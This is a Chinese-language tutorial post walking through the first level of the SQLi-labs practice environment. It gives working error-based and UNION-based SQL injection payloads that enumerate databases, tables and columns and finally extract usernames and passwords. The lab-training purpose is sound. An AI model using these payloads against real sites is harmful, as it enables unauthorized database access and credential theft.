ahxxx 2019-06-28
首先我们来了解一下什么是SQL注入?
所谓SQL注入,就是SQL Injection:是Web程序代码中对于用户提交的参数未做过滤就直接放到SQL语句中执行,导致参数中的特殊字符打破了SQL语句原有逻辑,可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
那么,我们应该怎么学习呢?SQLi-labs会是一个不错的选择。
// GET-基于错误的-单引号-字符型
点击less-1,进入以下界面:
我们看到黄字提示:Please input the ID as parameter with numeric value //“请输入ID为数值的参数”
所以我们在url后输入:?id=1,回车,得到下面的页面:
说明用id=1查到对应的一些数据,实际上进行了下面的查询
select * from TABLENAME where id=1;
我们再在URL后面增加一个 ' (单引号),发现报错:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
通过查看报错信息,我们猜测可能是因为后面加的单引号没闭合导致,于是,修改URL为:
/sqli-labs/Less-1/?id=1' or 1=1 --+
发现有效,--+成功注释了后面的代码,同样的,使用以下代码也成功查询到数据:
?id=1' or '1'='1
?id=1' or 1=1 --%20
?id=1' or 1=1%23
这里解释一下%23:%23是#的URL Encode得到的,和--+同是注释符。
常见URL Encode有:
%20 -> (空格)
%22 -> "
%23 -> #
%25 -> %
%27 -> '
至此,我们可以开始猜解数据库了。
?id=1' order by 5%23
采用折半查找,找到一个最大的不报错的数字,则为该表的字段长度,这里为3;
?id=' union select 1,2,3%23
由图可知回显点为第二、第三个字段,所以我们之后查询的内容要放在第二、第三字段才会显示;
?id=' union select 1,version(),3%23
?id=' union select 1,database(),user()%23
?id=' union select 1,(select group_concat(schema_name) from information_schema.schemata),3%23
?id=' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3%23
?id=' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3%23
?id=' union select 1,(select group_concat(username separator ';') from users),(select group_concat(password separator ';') from users)%23
至此,猜解完毕!